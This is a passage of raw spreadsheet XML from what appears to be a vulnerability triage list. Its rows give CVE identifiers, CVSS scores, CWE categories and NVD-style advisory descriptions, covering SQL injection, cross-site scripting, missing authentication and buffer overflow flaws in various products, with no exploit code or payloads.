t="n"><v>0.003</v></c><c r="I1979" s="5" t="inlineStr" /><c r="J1979" s="5" t="inlineStr"><is><t>mysql</t></is></c><c r="K1979" s="5" t="inlineStr" /><c r="L1979" s="5" t="inlineStr" /><c r="M1979" s="5" t="inlineStr" /><c r="N1979" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1979" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P1979" s="5" t="inlineStr" /><c r="Q1979" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="R1979" s="5" t="inlineStr"><is><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is></c><c r="S1979" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86221</t></is></c></row><row r="1980"><c r="A1980" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1980" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1980" s="5" t="inlineStr"><is><t>CVE-2026-86223</t></is></c><c r="D1980" s="5" t="n"><v>5.5</v></c><c r="E1980" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1980" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1980" s="5" t="inlineStr" /><c r="H1980" s="5" t="n"><v>0.003</v></c><c r="I1980" s="5" t="inlineStr" /><c r="J1980" s="5" t="inlineStr"><is><t>mysql</t></is></c><c r="K1980" s="5" t="inlineStr" /><c r="L1980" s="5" t="inlineStr" /><c r="M1980" s="5" t="inlineStr" /><c r="N1980" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1980" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P1980" s="5" t="inlineStr" /><c r="Q1980" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="R1980" s="5" t="inlineStr"><is><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is></c><c r="S1980" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86223</t></is></c></row><row r="1981"><c r="A1981" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1981" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1981" s="5" t="inlineStr"><is><t>CVE-2026-86225</t></is></c><c r="D1981" s="5" t="n"><v>5.5</v></c><c r="E1981" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1981" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1981" s="5" t="inlineStr" /><c r="H1981" s="5" t="n"><v>0.003</v></c><c r="I1981" s="5" t="inlineStr" /><c r="J1981" s="5" t="inlineStr"><is><t>mysql</t></is></c><c r="K1981" s="5" t="inlineStr" /><c r="L1981" s="5" t="inlineStr" /><c r="M1981" s="5" t="inlineStr" /><c r="N1981" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1981" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P1981" s="5" t="inlineStr" /><c r="Q1981" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="R1981" s="5" t="inlineStr"><is><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is></c><c r="S1981" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86225</t></is></c></row><row r="1982"><c r="A1982" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1982" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1982" s="5" t="inlineStr"><is><t>CVE-2026-86511</t></is></c><c r="D1982" s="5" t="n"><v>5.5</v></c><c r="E1982" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1982" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1982" s="5" t="inlineStr" /><c r="H1982" s="5" t="n"><v>0.004</v></c><c r="I1982" s="5" t="inlineStr" /><c r="J1982" s="5" t="inlineStr" /><c r="K1982" s="5" t="inlineStr" /><c r="L1982" s="5" t="inlineStr" /><c r="M1982" s="5" t="inlineStr" /><c r="N1982" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1982" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1982" s="5" t="inlineStr" /><c r="Q1982" s="5" t="inlineStr"><is><t>CWE-400, CWE-404</t></is></c><c r="R1982" s="5" t="inlineStr"><is><t>A vulnerability was found in java-json-tools jackson-coreutils 2.0. Affected by this vulnerability is the function BigDecimal.toPlainString of the file src/main/java/com/github/fge/jackson/JacksonUtils.java. Performing a manipulation results in resource consumption. The attack may be initiated remotely. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="S1982" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86511</t></is></c></row><row r="1983"><c r="A1983" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1983" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1983" s="5" t="inlineStr"><is><t>CVE-2026-86513</t></is></c><c r="D1983" s="5" t="n"><v>5.5</v></c><c r="E1983" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1983" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1983" s="5" t="inlineStr" /><c r="H1983" s="5" t="n"><v>0.004</v></c><c r="I1983" s="5" t="inlineStr" /><c r="J1983" s="5" t="inlineStr" /><c r="K1983" s="5" t="inlineStr" /><c r="L1983" s="5" t="inlineStr" /><c r="M1983" s="5" t="inlineStr" /><c r="N1983" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1983" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1983" s="5" t="inlineStr" /><c r="Q1983" s="5" t="inlineStr"><is><t>CWE-400, CWE-770</t></is></c><c r="R1983" s="5" t="inlineStr"><is><t>A security flaw has been discovered in java-json-tools jackson-coreutils 2.0. This vulnerability affects the function TreePointer.tokensFromInput of the file src/main/java/com/github/fge/jackson/jsonpointer/TreePointer.java of the component JSON Pointer parser. The manipulation results in allocation of resources. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="S1983" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86513</t></is></c></row><row r="1984"><c r="A1984" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1984" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1984" s="5" t="inlineStr"><is><t>CVE-2026-86519</t></is></c><c r="D1984" s="5" t="n"><v>5.5</v></c><c r="E1984" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1984" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1984" s="5" t="inlineStr" /><c r="H1984" s="5" t="n"><v>0.003</v></c><c r="I1984" s="5" t="inlineStr" /><c r="J1984" s="5" t="inlineStr" /><c r="K1984" s="5" t="inlineStr" /><c r="L1984" s="5" t="inlineStr" /><c r="M1984" s="5" t="inlineStr" /><c r="N1984" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1984" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1984" s="5" t="inlineStr" /><c r="Q1984" s="5" t="inlineStr"><is><t>CWE-200, CWE-284</t></is></c><c r="R1984" s="5" t="inlineStr"><is><t>A vulnerability was found in code-projects Student Crud Operation 1.0. This impacts an unknown function of the file /card_activation.sql of the component Backup File Handler. The manipulation results in information disclosure. The attack can be launched remotely. The exploit has been made public and could be used.</t></is></c><c r="S1984" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86519</t></is></c></row><row r="1985"><c r="A1985" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1985" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1985" s="5" t="inlineStr"><is><t>CVE-2026-86665</t></is></c><c r="D1985" s="5" t="n"><v>5.5</v></c><c r="E1985" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1985" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1985" s="5" t="inlineStr" /><c r="H1985" s="5" t="n"><v>0.004</v></c><c r="I1985" s="5" t="inlineStr" /><c r="J1985" s="5" t="inlineStr" /><c r="K1985" s="5" t="inlineStr" /><c r="L1985" s="5" t="inlineStr" /><c r="M1985" s="5" t="inlineStr" /><c r="N1985" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1985" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1985" s="5" t="inlineStr" /><c r="Q1985" s="5" t="inlineStr"><is><t>CWE-862, CWE-863</t></is></c><c r="R1985" s="5" t="inlineStr"><is><t>A vulnerability was identified in aircheng-org iWebShop-5 up to 5.15. This issue affects the function Update::index of the file controllers/update.php. The manipulation leads to missing authorization. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="S1985" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86665</t></is></c></row><row r="1986"><c r="A1986" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1986" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1986" s="5" t="inlineStr"><is><t>CVE-2026-86666</t></is></c><c r="D1986" s="5" t="n"><v>5.5</v></c><c r="E1986" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1986" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1986" s="5" t="inlineStr" /><c r="H1986" s="5" t="n"><v>0.005</v></c><c r="I1986" s="5" t="inlineStr" /><c r="J1986" s="5" t="inlineStr" /><c r="K1986" s="5" t="inlineStr" /><c r="L1986" s="5" t="inlineStr" /><c r="M1986" s="5" t="inlineStr" /><c r="N1986" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1986" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1986" s="5" t="inlineStr" /><c r="Q1986" s="5" t="inlineStr"><is><t>CWE-284, CWE-434</t></is></c><c r="R1986" s="5" t="inlineStr"><is><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is></c><c r="S1986" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86666</t></is></c></row><row r="1987"><c r="A1987" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1987" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1987" s="5" t="inlineStr"><is><t>CVE-2026-86669</t></is></c><c r="D1987" s="5" t="n"><v>5.5</v></c><c r="E1987" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1987" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1987" s="5" t="inlineStr" /><c r="H1987" s="5" t="n"><v>0.004</v></c><c r="I1987" s="5" t="inlineStr" /><c r="J1987" s="5" t="inlineStr" /><c r="K1987" s="5" t="inlineStr" /><c r="L1987" s="5" t="inlineStr" /><c r="M1987" s="5" t="inlineStr" /><c r="N1987" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1987" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1987" s="5" t="inlineStr" /><c r="Q1987" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="R1987" s="5" t="inlineStr"><is><t>A vulnerability was detected in aircheng-org iWebShop-5 up to 5.15. This affects the function Login of the file controllers/systemseller.php. Performing a manipulation of the argument Name results in improper authentication. It is possible to initiate the attack remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="S1987" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86669</t></is></c></row><row r="1988"><c r="A1988" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1988" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1988" s="5" t="inlineStr"><is><t>CVE-2026-86672</t></is></c><c r="D1988" s="5" t="n"><v>5.5</v></c><c r="E1988" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1988" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1988" s="5" t="inlineStr" /><c r="H1988" s="5" t="n"><v>0.003</v></c><c r="I1988" s="5" t="inlineStr" /><c r="J1988" s="5" t="inlineStr" /><c r="K1988" s="5" t="inlineStr" /><c r="L1988" s="5" t="inlineStr" /><c r="M1988" s="5" t="inlineStr" /><c r="N1988" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1988" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1988" s="5" t="inlineStr" /><c r="Q1988" s="5" t="inlineStr"><is><t>CWE-200, CWE-284</t></is></c><c r="R1988" s="5" t="inlineStr"><is><t>A vulnerability has been found in ningzichun Student Management System up to 98760f5711cf6dc8b4adca53a9e207ca49b02ebf. Affected is an unknown function of the file example.7z of the component Backup Handler. The manipulation leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="S1988" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86672</t></is></c></row><row r="1989"><c r="A1989" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1989" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1989" s="5" t="inlineStr"><is><t>CVE-2026-86673</t></is></c><c r="D1989" s="5" t="n"><v>5.5</v></c><c r="E1989" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1989" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1989" s="5" t="inlineStr" /><c r="H1989" s="5" t="n"><v>0.003</v></c><c r="I1989" s="5" t="inlineStr" /><c r="J1989" s="5" t="inlineStr"><is><t>mysql</t></is></c><c r="K1989" s="5" t="inlineStr" /><c r="L1989" s="5" t="inlineStr" /><c r="M1989" s="5" t="inlineStr" /><c r="N1989" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1989" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1989" s="5" t="inlineStr" /><c r="Q1989" s="5" t="inlineStr"><is><t>CWE-259, CWE-798</t></is></c><c r="R1989" s="5" t="inlineStr"><is><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is></c><c r="S1989" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86673</t></is></c></row><row r="1990"><c r="A1990" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1990" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1990" s="5" t="inlineStr"><is><t>CVE-2026-86716</t></is></c><c r="D1990" s="5" t="n"><v>5.5</v></c><c r="E1990" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1990" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1990" s="5" t="inlineStr" /><c r="H1990" s="5" t="n"><v>0.003</v></c><c r="I1990" s="5" t="inlineStr" /><c r="J1990" s="5" t="inlineStr" /><c r="K1990" s="5" t="inlineStr" /><c r="L1990" s="5" t="inlineStr" /><c r="M1990" s="5" t="inlineStr" /><c r="N1990" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1990" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1990" s="5" t="inlineStr" /><c r="Q1990" s="5" t="inlineStr"><is><t>CWE-119, CWE-122</t></is></c><c r="R1990" s="5" t="inlineStr"><is><t>A vulnerability was determined in Cesanta mJS up to 1.26. Affected is the function skip_spaces_and_comments of the file src/mjs_tok.c. Executing a manipulation can lead to heap-based buffer overflow. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="S1990" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86716</t></is></c></row><row r="1991"><c r="A1991" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1991" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1991" s="5" t="inlineStr"><is><t>CVE-2026-86808</t></is></c><c r="D1991" s="5" t="n"><v>5.5</v></c><c r="E1991" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1991" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1991" s="5" t="inlineStr" /><c r="H1991" s="5" t="n"><v>0.006</v></c><c r="I1991" s="5" t="inlineStr" /><c r="J1991" s="5" t="inlineStr" /><c r="K1991" s="5" t="inlineStr" /><c r="L1991" s="5" t="inlineStr" /><c r="M1991" s="5" t="inlineStr" /><c r="N1991" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1991" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1991" s="5" t="inlineStr" /><c r="Q1991" s="5" t="inlineStr"><is><t>CWE-287, CWE-306</t></is></c><c r="R1991" s="5" t="inlineStr"><is><t>A security vulnerability has been detected in moltis-org moltis up to 20260818.10. The affected element is the function vault_unlock_handler/vault_recovery_handler of the file vault.rs. Such manipulation leads to missing authentication. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 20260819.01 is sufficient to fix this issue. The name of the patch is 3b92dd64d5648f829968cf48bf67dc3113852fef. Upgrading the affected component is advised.</t></is></c><c r="S1991" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86808</t></is></c></row><row r="1992"><c r="A1992" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1992" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1992" s="5" t="inlineStr"><is><t>CVE-2025-14945</t></is></c><c r="D1992" s="5" t="n"><v>5.4</v></c><c r="E1992" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1992" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1992" s="5" t="inlineStr" /><c r="H1992" s="5" t="n"><v>0.002</v></c><c r="I1992" s="5" t="inlineStr" /><c r="J1992" s="5" t="inlineStr" /><c r="K1992" s="5" t="inlineStr" /><c r="L1992" s="5" t="inlineStr" /><c r="M1992" s="5" t="inlineStr" /><c r="N1992" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1992" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1992" s="5" t="inlineStr" /><c r="Q1992" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1992" s="5" t="inlineStr"><is><t>The Events Manager - Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to Stored Cross-Site Scripting via event attribute values in all versions up to, and including, 7.3.3. This is due to insufficient input sanitization when storing attribute values (using only `wp_unslash()` without sanitization) and lack of output escaping when rendering the '#_ATT{key}' placeholder. This makes it possible for authenticated attackers, with Author-level access and above, or unauthenticated attackers when anonymous event submissions are enabled, to inject arbitrary web scripts that execute when any user views the affected event page.</t></is></c><c r="S1992" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-14945</t></is></c></row><row r="1993"><c r="A1993" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1993" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1993" s="5" t="inlineStr"><is><t>CVE-2025-64542</t></is></c><c r="D1993" s="5" t="n"><v>5.4</v></c><c r="E1993" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1993" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1993" s="5" t="inlineStr" /><c r="H1993" s="5" t="n"><v>0.003</v></c><c r="I1993" s="5" t="inlineStr" /><c r="J1993" s="5" t="inlineStr" /><c r="K1993" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1993" s="5" t="inlineStr" /><c r="M1993" s="5" t="inlineStr" /><c r="N1993" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1993" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1993" s="5" t="inlineStr" /><c r="Q1993" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R199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1993" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64542</t></is></c></row><row r="1994"><c r="A1994" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1994" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1994" s="5" t="inlineStr"><is><t>CVE-2025-64584</t></is></c><c r="D1994" s="5" t="n"><v>5.4</v></c><c r="E1994" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1994" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1994" s="5" t="inlineStr" /><c r="H1994" s="5" t="n"><v>0.003</v></c><c r="I1994" s="5" t="inlineStr" /><c r="J1994" s="5" t="inlineStr" /><c r="K1994" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1994" s="5" t="inlineStr" /><c r="M1994" s="5" t="inlineStr" /><c r="N1994" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1994" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1994" s="5" t="inlineStr" /><c r="Q1994" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R199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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64584</t></is></c></row><row r="1995"><c r="A1995" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1995" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1995" s="5" t="inlineStr"><is><t>CVE-2025-64588</t></is></c><c r="D1995" s="5" t="n"><v>5.4</v></c><c r="E1995" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1995" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1995" s="5" t="inlineStr" /><c r="H1995" s="5" t="n"><v>0.003</v></c><c r="I1995" s="5" t="inlineStr" /><c r="J1995" s="5" t="inlineStr" /><c r="K1995" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1995" s="5" t="inlineStr" /><c r="M1995" s="5" t="inlineStr" /><c r="N1995" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1995" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1995" s="5" t="inlineStr" /><c r="Q1995" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R199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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64588</t></is></c></row><row r="1996"><c r="A1996" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1996" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1996" s="5" t="inlineStr"><is><t>CVE-2025-64589</t></is></c><c r="D1996" s="5" t="n"><v>5.4</v></c><c r="E1996" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1996" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1996" s="5" t="inlineStr" /><c r="H1996" s="5" t="n"><v>0.003</v></c><c r="I1996" s="5" t="inlineStr" /><c r="J1996" s="5" t="inlineStr" /><c r="K1996" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1996" s="5" t="inlineStr" /><c r="M1996" s="5" t="inlineStr" /><c r="N1996" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1996" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1996" s="5" t="inlineStr" /><c r="Q1996" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R199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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64589</t></is></c></row><row r="1997"><c r="A1997" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1997" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1997" s="5" t="inlineStr"><is><t>CVE-2025-64610</t></is></c><c r="D1997" s="5" t="n"><v>5.4</v></c><c r="E1997" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1997" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1997" s="5" t="inlineStr" /><c r="H1997" s="5" t="n"><v>0.003</v></c><c r="I1997" s="5" t="inlineStr" /><c r="J1997" s="5" t="inlineStr" /><c r="K1997" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1997" s="5" t="inlineStr" /><c r="M1997" s="5" t="inlineStr" /><c r="N1997" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1997" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1997" s="5" t="inlineStr" /><c r="Q1997" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R199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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64610</t></is></c></row><row r="1998"><c r="A1998" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1998" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1998" s="5" t="inlineStr"><is><t>CVE-2025-64618</t></is></c><c r="D1998" s="5" t="n"><v>5.4</v></c><c r="E1998" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1998" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1998" s="5" t="inlineStr" /><c r="H1998" s="5" t="n"><v>0.003</v></c><c r="I1998" s="5" t="inlineStr" /><c r="J1998" s="5" t="inlineStr" /><c r="K1998" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1998" s="5" t="inlineStr" /><c r="M1998" s="5" t="inlineStr" /><c r="N1998" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1998" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1998" s="5" t="inlineStr" /><c r="Q1998" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R199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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64618</t></is></c></row><row r="1999"><c r="A1999" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1999" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1999" s="5" t="inlineStr"><is><t>CVE-2025-64830</t></is></c><c r="D1999" s="5" t="n"><v>5.4</v></c><c r="E1999" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1999" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1999" s="5" t="inlineStr" /><c r="H1999" s="5" t="n"><v>0.003</v></c><c r="I1999" s="5" t="inlineStr" /><c r="J1999" s="5" t="inlineStr" /><c r="K1999" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1999" s="5" t="inlineStr" /><c r="M1999" s="5" t="inlineStr" /><c r="N1999" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1999" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1999" s="5" t="inlineStr" /><c r="Q1999" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R199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1999" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64830</t></is></c></row><row r="2000"><c r="A2000" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2000" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2000" s="5" t="inlineStr"><is><t>CVE-2025-64838</t></is></c><c r="D2000" s="5" t="n"><v>5.4</v></c><c r="E2000" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2000" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2000" s="5" t="inlineStr" /><c r="H2000" s="5" t="n"><v>0.003</v></c><c r="I2000" s="5" t="inlineStr" /><c r="J2000" s="5" t="inlineStr" /><c r="K2000" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2000" s="5" t="inlineStr" /><c r="M2000" s="5" t="inlineStr" /><c r="N2000" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2000" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2000" s="5" t="inlineStr" /><c r="Q2000" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R200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00" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64838</t></is></c></row><row r="2001"><c r="A2001" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2001" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2001" s="5" t="inlineStr"><is><t>CVE-2025-64854</t></is></c><c r="D2001" s="5" t="n"><v>5.4</v></c><c r="E2001" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2001" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2001" s="5" t="inlineStr" /><c r="H2001" s="5" t="n"><v>0.003</v></c><c r="I2001" s="5" t="inlineStr" /><c r="J2001" s="5" t="inlineStr" /><c r="K2001" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2001" s="5" t="inlineStr" /><c r="M2001" s="5" t="inlineStr" /><c r="N2001" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2001" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2001" s="5" t="inlineStr" /><c r="Q2001" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R200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01" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64854</t></is></c></row><row r="2002"><c r="A2002" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2002" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2002" s="5" t="inlineStr"><is><t>CVE-2025-64866</t></is></c><c r="D2002" s="5" 